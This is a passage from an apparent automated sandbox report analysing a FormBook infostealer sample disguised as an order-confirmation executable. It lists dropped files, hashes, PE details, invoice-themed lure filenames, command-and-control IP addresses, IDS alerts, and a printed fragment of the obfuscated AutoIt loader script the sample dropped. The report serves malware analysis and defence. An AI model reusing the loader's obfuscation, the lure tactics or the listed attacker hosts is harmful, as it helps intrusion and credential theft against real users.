                                                                                            • 74.124.195.209
                                                                                            57229937-122020-4-7676523.docGet hashmaliciousBrowse
                                                                                            • 23.235.210.245
                                                                                            PO-RY 001-21 Accuri.jarGet hashmaliciousBrowse
                                                                                            • 192.249.115.168
                                                                                            P8ob8zaRpi.exeGet hashmaliciousBrowse
                                                                                            • 209.182.192.90
                                                                                            Purchase Order 02556.xlsxGet hashmaliciousBrowse
                                                                                            • 209.182.192.90
                                                                                            payment _doc.exeGet hashmaliciousBrowse
                                                                                            • 173.231.192.44
                                                                                            Statement for T10495 - 18-01-21 15-23.jarGet hashmaliciousBrowse
                                                                                            • 192.249.115.168
                                                                                            J0OmHIagw8.exeGet hashmaliciousBrowse
                                                                                            • 205.134.254.189
                                                                                            SWIFT_COPY00993Payment_advic4555pdf.exeGet hashmaliciousBrowse
                                                                                            • 144.208.68.94
                                                                                            PURCHASE ORDER_no. 64392094_pdf.exeGet hashmaliciousBrowse
                                                                                            • 66.117.4.240
                                                                                            https://notification1.bubbleapps.io/version-test?debug_mode=trueGet hashmaliciousBrowse
                                                                                            • 205.134.249.83
                                                                                            https://zarachim-67490.firebaseapp.com/aeb3135b436aa55373822c010763dd54#c3RldmUuaGVuc29uQHJ5ZXJzb24uY29tGet hashmaliciousBrowse
                                                                                            • 173.231.203.136
                                                                                            http://cjy.mxGet hashmaliciousBrowse
                                                                                            • 192.249.127.205
                                                                                            https://manage-ordersrvicsc.asgetrw.com/Get hashmaliciousBrowse
                                                                                            • 173.231.204.123

                                                                                            JA3 Fingerprints

                                                                                            No context

                                                                                            Dropped Files

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeQuotation.exeGet hashmaliciousBrowse
                                                                                              PO13132021.exeGet hashmaliciousBrowse
                                                                                                Tender documents_FOB_Offer_Printout.PDF.exeGet hashmaliciousBrowse
                                                                                                  HTG-9087650.exeGet hashmaliciousBrowse
                                                                                                    Order-0S94442VD VictoryJSC.xlsxGet hashmaliciousBrowse
                                                                                                      Purchase Order.xlsxGet hashmaliciousBrowse
                                                                                                        PO#21010028 - SYINDAC QT-00820_pdf.exeGet hashmaliciousBrowse
                                                                                                          MC8ZX01sSo.exeGet hashmaliciousBrowse
                                                                                                            F6AAdCq3uj.exeGet hashmaliciousBrowse
                                                                                                              tZy7EYc9Da.exeGet hashmaliciousBrowse
                                                                                                                YMQ6XNETnU.exeGet hashmaliciousBrowse
                                                                                                                  AWB 9899691012 TRACKING INFO_pdf.exeGet hashmaliciousBrowse
                                                                                                                    BANK FORM.xlsxGet hashmaliciousBrowse
                                                                                                                      order0004345.xlsxGet hashmaliciousBrowse
                                                                                                                        Bill of Lading BL.xlsxGet hashmaliciousBrowse
                                                                                                                          Clntnjk.xlsxGet hashmaliciousBrowse
                                                                                                                            HTG-9066543.exeGet hashmaliciousBrowse
                                                                                                                              vbc.exeGet hashmaliciousBrowse
                                                                                                                                HTMY-209871640.exeGet hashmaliciousBrowse
                                                                                                                                  YOeg64zDX4.exeGet hashmaliciousBrowse
                                                                                                                                    C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeQuotation.exeGet hashmaliciousBrowse
                                                                                                                                      PO13132021.exeGet hashmaliciousBrowse
                                                                                                                                        HTG-9087650.exeGet hashmaliciousBrowse
                                                                                                                                          Order-0S94442VD VictoryJSC.xlsxGet hashmaliciousBrowse
                                                                                                                                            Purchase Order.xlsxGet hashmaliciousBrowse
                                                                                                                                              PO#21010028 - SYINDAC QT-00820_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                MC8ZX01sSo.exeGet hashmaliciousBrowse
                                                                                                                                                  F6AAdCq3uj.exeGet hashmaliciousBrowse
                                                                                                                                                    AWB 9899691012 TRACKING INFO_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      HTG-9066543.exeGet hashmaliciousBrowse

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):893608
                                                                                                                                                        Entropy (8bit):6.570843086702839
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:apVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M0:aT3E53Myyzl0hMf1tr7Caw8M0
                                                                                                                                                        MD5:535DD1329AEF11BF4654B3270F026D5B
                                                                                                                                                        SHA1:9C84DE0BDE8333F852120AB40710545B3F799300
                                                                                                                                                        SHA-256:B31445FC4B8803D1B7122A6563002CFE3E925FFD1FDC9B84FBA6FC78F6A8B955
                                                                                                                                                        SHA-512:A552E20A09A796A6E3E18DECE308880069C958CF9136BB4FC3EE726D6BC9B2F8EDDBCFF06FF9F9DED4DD268F5D0F39D516AD42ECCE6455A4BF5CF4F3CB4C4ECC
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                        • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: PO13132021.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: HTG-9087650.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: Order-0S94442VD VictoryJSC.xlsx, Detection: malicious, Browse
                                                                                                                                                        • Filename: Purchase Order.xlsx, Detection: malicious, Browse
                                                                                                                                                        • Filename: PO#21010028 - SYINDAC QT-00820_pdf.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: MC8ZX01sSo.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: F6AAdCq3uj.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: AWB 9899691012 TRACKING INFO_pdf.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: HTG-9066543.exe, Detection: malicious, Browse
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z..........................................@...........................................@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Nla\ccdlyhm.op
                                                                                                                                                        Process:C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):164352
                                                                                                                                                        Entropy (8bit):7.998850005985958
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:3072:l3Mvkvpc4/3NupJJT0/NSp6GRlutg4DoVfOMXwxhGf8Jz:lcgpc4/upZDuyW166sez
                                                                                                                                                        MD5:405B6B6C194D24D18CA76FB7F0A0B67A
                                                                                                                                                        SHA1:4FDF2C18626D259B98F3B62DA97E15E075D6F694
                                                                                                                                                        SHA-256:EDA987BD44CC37D5BAFB9DC5E8A43131BC86E8C5DC530B1288F8B8C85B12A2B1
                                                                                                                                                        SHA-512:B085C91E0A6606517E596AC6B78BDA5E6323066974DF15CDFC9EB844EA5D58BECCE9EC69D8CF65A68746465E4C254FE14A0F46075C837CD8AD45CE33591FD75D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: *..+2;.>0.W...m8.h..q.:..({hn.zw@%..^kK..<,....;..C....-.F.^...?...}...U.WY........VN.Z......-YhO&+".:..a../.....-.OZ]....%...{.z...:+&../.q..W.'N(r...?.^8.....K.Q.j.....jp...gX.d....B._.....5.=...]..._......q......o.l#.Lk.....>p|..}2.nfc.\..A...K.oN.U.W.Q......pt...|5b..Y......Z2.n.Z.L,.....{....w..0.sh.J..,n..7....KV.L......?.......%.}...,U9.......M3S]..$...E..i.6.r...5.;.b.y.N.y.rR......BP..K...Bi..........H..{.....g..$ou......m.......,..ie.....6.G[...T./*....H@ba..wE>....0)....mAc:^%3.....T<m..i._v>..q...m.v7...ghP..x.]. ?....z.ah|..H.._...c{A...u....[.v.u8.lcB).9K4........l..5.X..z.0.&...wO.:...}...i...(.?.R.....Oc......s....^..>B...M...^w[6....7_Y.CO...cN..V.......2..3.e.&...r.3f.n..Ik]Z.SOSPV.]j...A 2$.v..R.J.1.8.U..B.jn....t....0....m.f..v.30,.........wY.o...n.....y.....n.Y<.-d..X.,&.$.x..s.f..S......7#.k...?.vO.j..sc.O.......:?....{...J0Z..D..WO^....R..u..ma...n#..*B......f...O4z..8.\{R.aP..,...?.$.....-"p.."..84P..c..Q.......
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
                                                                                                                                                        Process:C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe
                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):299425
                                                                                                                                                        Entropy (8bit):4.128823447522899
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:+Efbh4MHM9MJ0MIv/MQPOTdKPtExIPR63AZL66LbtqcxwejeuR575hMhHShgZ1Q+:+EDZcMoO5cAlEcx
                                                                                                                                                        MD5:952B37468E91AC2BE311A1C127F9F165
                                                                                                                                                        SHA1:CB08D3AC28B032F9AF821A87A25FC04C6873DC3A
                                                                                                                                                        SHA-256:BCEC27CC70FE9ADCEF6F3D5BA15CEB811B6D1A136D1966AA57CFE74991CA8AE6
                                                                                                                                                        SHA-512:DC2AE1A65316D388416292C8FF4A192D02F9DD4539A6181FC4EEDF520C20C2B92CEA16A6B165DE9DBD75709C56A5A272C1CB93F92EC95665B538258BD407C337
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: Global $C30vpm = Execute("Chr")..#NoTrayIcon..Global $B31j26z1md, $W321ie, $O33uzbcy4, $D34cqdznl, $Y35w6d, $T36edp5xe..For $B31j26z1md = 0 To Random(5, 8, 1).. $O33uzbcy4 = 0.. For $D34cqdznl = 2 To 100.. $W321ie = True.. $Y35w6d = 2.. While $Y35w6d*$Y35w6d<=$B31j26z1md.. If Mod($B31j26z1md, $Y35w6d) == 0 Then.. $O33uzbcy4 = False.. ExitLoop.. EndIf.. $Y35w6d += 1.. WEnd.. If $W321ie Then $O33uzbcy4 = $D34cqdznl.. Next..Next..Dim $L3232f8wegf = GUICreate($C30vpm((-402+481))&$C30vpm((-364+481))&$C30vpm((-365+481))&$C30vpm((-383+481))&$C30vpm((-364+481))&$C30vpm((-382+481))&$C30vpm((-374+481))&$C30vpm((-449+481))&$C30vpm((-408+481))&$C30vpm((-371+481))&$C30vpm((-382+481)), 102, 240, -99999, -99999, 0, 128)....GUISetState(@SW_SHOW)..Global $Y3334j0u3f = Execute($C30vpm((-412+481))&$C30vpm((-361+481))&$C30vpm((-380+481))&$C30vpm((-382+481))&$C30vpm((-364+481))&$C30vpm((-365+481))&$C30vpm((-380+481)))..Global $D3432hvyircob = $Y3334j0u3f($C30vpm((-413+481))&$C30vpm((-373+4
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe
                                                                                                                                                        Process:C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):893608
                                                                                                                                                        Entropy (8bit):6.620131693023677
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                                                                                                                        MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                                                                                                                        SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                                                                                                                        SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                                                                                                                        SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Metadefender, Detection: 5%, Browse
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                        • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: PO13132021.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: Tender documents_FOB_Offer_Printout.PDF.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: HTG-9087650.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: Order-0S94442VD VictoryJSC.xlsx, Detection: malicious, Browse
                                                                                                                                                        • Filename: Purchase Order.xlsx, Detection: malicious, Browse
                                                                                                                                                        • Filename: PO#21010028 - SYINDAC QT-00820_pdf.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: MC8ZX01sSo.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: F6AAdCq3uj.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: tZy7EYc9Da.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: YMQ6XNETnU.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: AWB 9899691012 TRACKING INFO_pdf.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: BANK FORM.xlsx, Detection: malicious, Browse
                                                                                                                                                        • Filename: order0004345.xlsx, Detection: malicious, Browse
                                                                                                                                                        • Filename: Bill of Lading BL.xlsx, Detection: malicious, Browse
                                                                                                                                                        • Filename: Clntnjk.xlsx, Detection: malicious, Browse
                                                                                                                                                        • Filename: HTG-9066543.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: vbc.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: HTMY-209871640.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: YOeg64zDX4.exe, Detection: malicious, Browse
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsmE343.tmp
                                                                                                                                                        Process:C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1359849
                                                                                                                                                        Entropy (8bit):6.90869822423033
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:xpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M0R/upZDud:xT3E53Myyzl0hMf1tr7Caw8M0ROCyo
                                                                                                                                                        MD5:2CFDA9022EA3CDD01F5788BB5E1709BF
                                                                                                                                                        SHA1:57F7EAB42DFA453775E09E4E60D5DBDB904A1E00
                                                                                                                                                        SHA-256:DBB3E69C4F7918F7F2050C4C643DD4362469E7D72B03B0450535D7665696CFC2
                                                                                                                                                        SHA-512:D1332443EBDC25C72C446B73469381D09920AACCC608C2261459D2FB1BAA259956D47D69091E7F390FA509123B3D6BCB272B9E6623203808DFE54E09E6FB1E64
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: ........,...................................................................................................................................................................................................................................................................................J...............2...g...............................................................j...............................................................................................................................N.................../...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                        Entropy (8bit):7.97851220387635
                                                                                                                                                        TrID:
                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                        File name:Order confirmation 64236000000025 26.01.2021.exe
                                                                                                                                                        File size:596473
                                                                                                                                                        MD5:b18e939428b3ffc67c750e2a0988d61a
                                                                                                                                                        SHA1:405cc59b2da9a6187bd65e7c2fa4f9ebdae32111
                                                                                                                                                        SHA256:238dd9cb9b1c235e2babbc3f3b1372da8d76e4d94a4440776814957e0fd09f0b
                                                                                                                                                        SHA512:8b81ec5ec2276ec7ed82e6e696c33b73f416dea29781bab782930550144bde4f45d918514d80f242128848783b3acdeeeacb731504a7a20ee8793df84bfa93e6
                                                                                                                                                        SSDEEP:12288:c18+wXg8XMfLpYKcMUNv6TGNnaf3Ymft0yavIkD:c1wgJDpXcM2STiVRpdD
                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d..........a4............@

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:00828e8e8686b000

                                                                                                                                                        Static PE Info

                                                                                                                                                        General

                                                                                                                                                        Entrypoint:0x403461
                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                        Digitally signed:false
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                        Time Stamp:0x5F24D6E4 [Sat Aug 1 02:43:48 2020 UTC]
                                                                                                                                                        TLS Callbacks:
                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                        OS Version Major:4
                                                                                                                                                        OS Version Minor:0
                                                                                                                                                        File Version Major:4
                                                                                                                                                        File Version Minor:0
                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                        Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                                                                                                                                        Entrypoint Preview

                                                                                                                                                        Instruction
                                                                                                                                                        sub esp, 00000184h
                                                                                                                                                        push ebx
                                                                                                                                                        push esi
                                                                                                                                                        push edi
                                                                                                                                                        xor ebx, ebx
                                                                                                                                                        push 00008001h
                                                                                                                                                        mov dword ptr [esp+18h], ebx
                                                                                                                                                        mov dword ptr [esp+10h], 0040A130h
                                                                                                                                                        mov dword ptr [esp+20h], ebx
                                                                                                                                                        mov byte ptr [esp+14h], 00000020h
                                                                                                                                                        call dword ptr [004080B0h]
                                                                                                                                                        call dword ptr [004080C0h]
                                                                                                                                                        and eax, BFFFFFFFh
                                                                                                                                                        cmp ax, 00000006h
                                                                                                                                                        mov dword ptr [0042474Ch], eax
                                                                                                                                                        je 00007FAD40A76903h
                                                                                                                                                        push ebx
                                                                                                                                                        call 00007FAD40A79A7Eh
                                                                                                                                                        cmp eax, ebx
                                                                                                                                                        je 00007FAD40A768F9h
                                                                                                                                                        push 00000C00h
                                                                                                                                                        call eax
                                                                                                                                                        mov esi, 004082A0h
                                                                                                                                                        push esi
                                                                                                                                                        call 00007FAD40A799FAh
                                                                                                                                                        push esi
                                                                                                                                                        call dword ptr [004080B8h]
                                                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                        cmp byte ptr [esi], bl
                                                                                                                                                        jne 00007FAD40A768DDh
                                                                                                                                                        push 0000000Bh
                                                                                                                                                        call 00007FAD40A79A52h
                                                                                                                                                        push 00000009h
                                                                                                                                                        call 00007FAD40A79A4Bh
                                                                                                                                                        push 00000007h
                                                                                                                                                        mov dword ptr [00424744h], eax
                                                                                                                                                        call 00007FAD40A79A3Fh
                                                                                                                                                        cmp eax, ebx
                                                                                                                                                        je 00007FAD40A76901h
                                                                                                                                                        push 0000001Eh
                                                                                                                                                        call eax
                                                                                                                                                        test eax, eax
                                                                                                                                                        je 00007FAD40A768F9h
                                                                                                                                                        or byte ptr [0042474Fh], 00000040h
                                                                                                                                                        push ebp
                                                                                                                                                        call dword ptr [00408038h]
                                                                                                                                                        push ebx
                                                                                                                                                        call dword ptr [00408288h]
                                                                                                                                                        mov dword ptr [00424818h], eax
                                                                                                                                                        push ebx
                                                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                                                        push 00000160h
                                                                                                                                                        push eax
                                                                                                                                                        push ebx
                                                                                                                                                        push 0041FD10h
                                                                                                                                                        call dword ptr [0040816Ch]
                                                                                                                                                        push 0040A1ECh

                                                                                                                                                        Rich Headers

                                                                                                                                                        Programming Language:
                                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                        Data Directories

                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x84380xa0.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x6bc.rsrc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                        Sections

                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                        .text0x10000x623c0x6400False0.65859375data6.40257705324IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .rdata0x80000x12740x1400False0.43359375data5.05749598324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .data0xa0000x1a8580x600False0.445963541667data4.08975001509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .rsrc0x2d0000x6bc0x800False0.41259765625data4.23827605847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                        Resources

                                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                                        RT_DIALOG0x2d1000x100dataEnglishUnited States
                                                                                                                                                        RT_DIALOG0x2d2000x11cdataEnglishUnited States
                                                                                                                                                        RT_DIALOG0x2d31c0x60dataEnglishUnited States
                                                                                                                                                        RT_MANIFEST0x2d37c0x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                                        Imports

                                                                                                                                                        DLLImport
                                                                                                                                                        ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                                                                                                        SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                                                                                                        ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                                                                                                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                                        USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                                                                                                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                                                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                                                                                                        Possible Origin

                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                        EnglishUnited States

                                                                                                                                                        Network Behavior

                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                        01/27/21-15:40:13.548456TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.5172.120.228.88
                                                                                                                                                        01/27/21-15:40:13.548456TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.5172.120.228.88
                                                                                                                                                        01/27/21-15:40:13.548456TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.5172.120.228.88
                                                                                                                                                        01/27/21-15:40:40.054194TCP1201ATTACK-RESPONSES 403 Forbidden804974134.102.136.180192.168.2.5
                                                                                                                                                        01/27/21-15:41:43.499735TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.5172.120.228.88
                                                                                                                                                        01/27/21-15:41:43.499735TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.5172.120.228.88
                                                                                                                                                        01/27/21-15:41:43.499735TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.5172.120.228.88
                                                                                                                                                        01/27/21-15:42:11.631048TCP1201ATTACK-RESPONSES 403 Forbidden804976534.102.136.180192.168.2.5

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Jan 27, 2021 15:39:50.840389013 CET4973280192.168.2.5192.254.186.135
                                                                                                                                                        Jan 27, 2021 15:39:51.025711060 CET8049732192.254.186.135192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:51.025801897 CET4973280192.168.2.5192.254.186.135
                                                                                                                                                        Jan 27, 2021 15:39:51.025964975 CET4973280192.168.2.5192.254.186.135
                                                                                                                                                        Jan 27, 2021 15:39:51.213597059 CET8049732192.254.186.135192.168.2.5
